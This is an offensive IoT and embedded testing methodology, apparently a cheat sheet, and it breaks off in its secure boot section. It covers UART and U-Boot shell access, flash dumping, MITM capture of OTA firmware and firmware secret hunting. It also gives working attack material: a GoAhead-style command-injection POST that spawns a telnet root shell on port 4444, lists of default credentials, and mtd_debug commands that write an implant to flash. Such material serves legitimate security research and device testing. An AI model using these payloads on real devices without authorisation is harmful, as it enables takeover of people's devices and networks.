offensive-iot

# IoT & Embedded — Offensive Testing Methodology

## Quick Workflow

1. **Recon the device physically** — identify SoC, flash, debug interfaces, radios
2. **Get the firmware** — vendor download, OTA capture, hardware dump, or chip-off
3. **Unpack and analyze** — filesystems, services, secrets, default creds, vuln components
4. **Establish runtime access** — UART shell, telnet/SSH default creds, exploit chain
5. **Pivot** — to companion app, cloud API, neighboring devices via mesh / wireless

---

## Hardware Reconnaissance

### PCB Inspection

- ID the **SoC** by markings (Realtek, Mediatek, Espressif, Broadcom, Allwinner, NXP, STM32, etc.)
- ID **flash** (8-pin SOIC = SPI NOR; BGA = eMMC; TSOP = NAND)
- Find **debug headers**: TX/RX/GND/VCC pads (UART), 4–10 pin (JTAG), 4 pin (SWD)
- Find test points labeled `TX`, `RX`, `TCK`, `TMS`, `TDO`, `TDI`, `RST`, `BOOT`

### Tools

| Tool | Use |
|------|-----|
| Multimeter | Identify GND, VCC rails before connecting |
| Logic analyzer (Saleae, DSLogic) | Find UART baud, SPI clock, identify protocols |
| USB-UART (FT232, CP2102) | UART console |
| Bus Pirate / Glasgow | UART, SPI, I2C, JTAG generic |
| J-Link / Black Magic Probe | JTAG / SWD MCU debugging |
| CH341A programmer | Cheap SPI flash dumper |
| XGecu T48 | Modern universal programmer (NAND/eMMC/SPI) |
| ChipQuik / hot-air | Chip-off desolder |

### UART Discovery

```bash
# Find baud rate
for b in 9600 19200 38400 57600 115200 230400 460800 921600; do
  echo "=== $b ==="
  timeout 5 minicom -b $b -D /dev/ttyUSB0 -C uart_$b.log
done
grep -l -E "U-Boot|Linux|Bootloader|console|login" uart_*.log
```

Look for: U-Boot console (often `Hit any key` countdown), Linux init messages, root shell on console, login prompt.

### Bootloader Console Drop

```
# At U-Boot countdown, mash space or key listed
Hit any key to stop autoboot:  0
=> printenv                   # full env, often includes boot args
=> setenv bootargs ${bootargs} init=/bin/sh
=> boot                       # Linux comes up to root shell, no login
```

If U-Boot is locked, try:
- `CONFIG_DELAY_AUTOBOOT_KEYED` keyword (vendor-specific)
- `Ctrl+C` / `Ctrl+B` / specific magic strings
- Glitch the U-Boot version-check / signature-check (see Fault Injection)

---

## Flash Dumping

### SPI NOR (most common consumer IoT)

```bash
# In-circuit dump (hold SoC in reset to avoid bus contention)
flashrom -p ch341a_spi -r firmware.bin

# Verify
file firmware.bin && binwalk firmware.bin
```

If the SoC fights you: desolder the SPI chip, dump in socket, re-solder.

### eMMC / NAND

eMMC is desolder-then-read: BGA-153/169 to SD adapter (cheap eBay), use a USB SD reader.

NAND requires bit-flipping and ECC handling — `nanddump`/`yaffshiv`/`ubireader` post-extraction.

### OTA Capture

Many devices fetch firmware over HTTP(S). MITM the device:

```bash
# Captive AP + transparent proxy
sudo create_ap wlan0 eth0 IoTLab
mitmproxy --mode transparent --showhost --ssl-insecure
# Or for non-SNI / pinning, use bettercap with custom DNS
```

Capture the URL, download directly, dissect.

---

## Firmware Analysis

### Initial Triage

```bash
binwalk -Me firmware.bin           # Extract recursively
binwalk -E firmware.bin            # Entropy plot — flat = encrypted/compressed
strings firmware.bin | grep -iE "(passwd|key|token|admin|http|ssid)"
```

### Filesystem Mounting

```bash
# SquashFS (most consumer Linux IoT)
unsquashfs -d rootfs squashfs.bin

# JFFS2 / UBIFS (NAND-backed)
jefferson jffs2.bin -d rootfs
ubireader_extract_files ubi.bin -o rootfs
```

### Embedded-Linux Quick Wins

```bash
# Hardcoded credentials and keys
grep -RIE "(BEGIN (RSA |DSA |EC )?PRIVATE KEY|api[_-]?key|secret|token|passwd|root:[^*])" rootfs/
find rootfs -name "*.pem" -o -name "*.key" -o -name "shadow"

# Telnet/SSH default creds
cat rootfs/etc/passwd rootfs/etc/shadow
grep -r "telnetd" rootfs/etc/init.d
grep -r "dropbear\|sshd" rootfs/

# Setuid binaries
find rootfs -perm -4000 -type f

# Vulnerable busybox / dropbear / openssl versions
rootfs/bin/busybox 2>&1 | head -1
strings rootfs/sbin/dropbear | grep "Dropbear v"
strings rootfs/usr/lib/libssl* | grep "OpenSSL "

# Web admin: lighttpd / mini_httpd / boa / GoAhead — known CVE goldmine
find rootfs -name "lighttpd*" -o -name "boa" -o -name "goahead" -o -name "mini_httpd"
```

### CGI / Web Admin Auditing

GoAhead, Boa, mini_httpd — abandoned codebases, command injection on every other CGI parameter.

```bash
# Disassemble a CGI
file rootfs/www/cgi-bin/setup.cgi
# Often plain ELF MIPS/ARM — analyze in Ghidra
ghidra-headlessAnalyzer -import rootfs/www/cgi-bin/setup.cgi
```

Common patterns:
- `system()` / `popen()` with concatenated query string args
- `sprintf` then `system` — easy command injection
- Auth check via comparing cookie to plaintext file (race / replay)

---

## Runtime Exploitation

### Console / Telnet Default Creds

Try (per device class): `admin/admin`, `root/root`, `root/<empty>`, `admin/password`, `support/support`, `cisco/cisco`, vendor brand as user/pass. **Always try `root/<serial number>`** — many vendors use a per-device default.

### Web Admin Command Injection

```http
POST /goform/setSysAdm
Cookie: SESSIONID=...
admin_user=admin&admin_pwd=password;telnetd -l /bin/sh -p 4444;
```

### MTD Writes (re-flash from runtime)

If you have a root shell:

```bash
cat /proc/mtd          # list partitions
mtd_debug erase /dev/mtd2 0 0x10000
mtd_debug write /dev/mtd2 0 0x10000 implant.bin
```

### /dev/mem

On older kernels without `CONFIG_STRICT_DEVMEM`, `/dev/mem` is read/write to physical memory — full system compromise from any root context.

---

## Bootloader / Secure Boot Attacks

### U-Boot Quick Bypasses

- `setenv bootargs ${bootargs} init=/bin/sh`
- `setenv preboot 'echo 1 > /sys/...'` (run command before kernel)
- `tftpboot` — load attacker kernel from network
- `bootm` of a memory-resident image you `loadb`-uploaded over UART

### Secure Boot

Modern devices verify signed bootloaders / kernels. By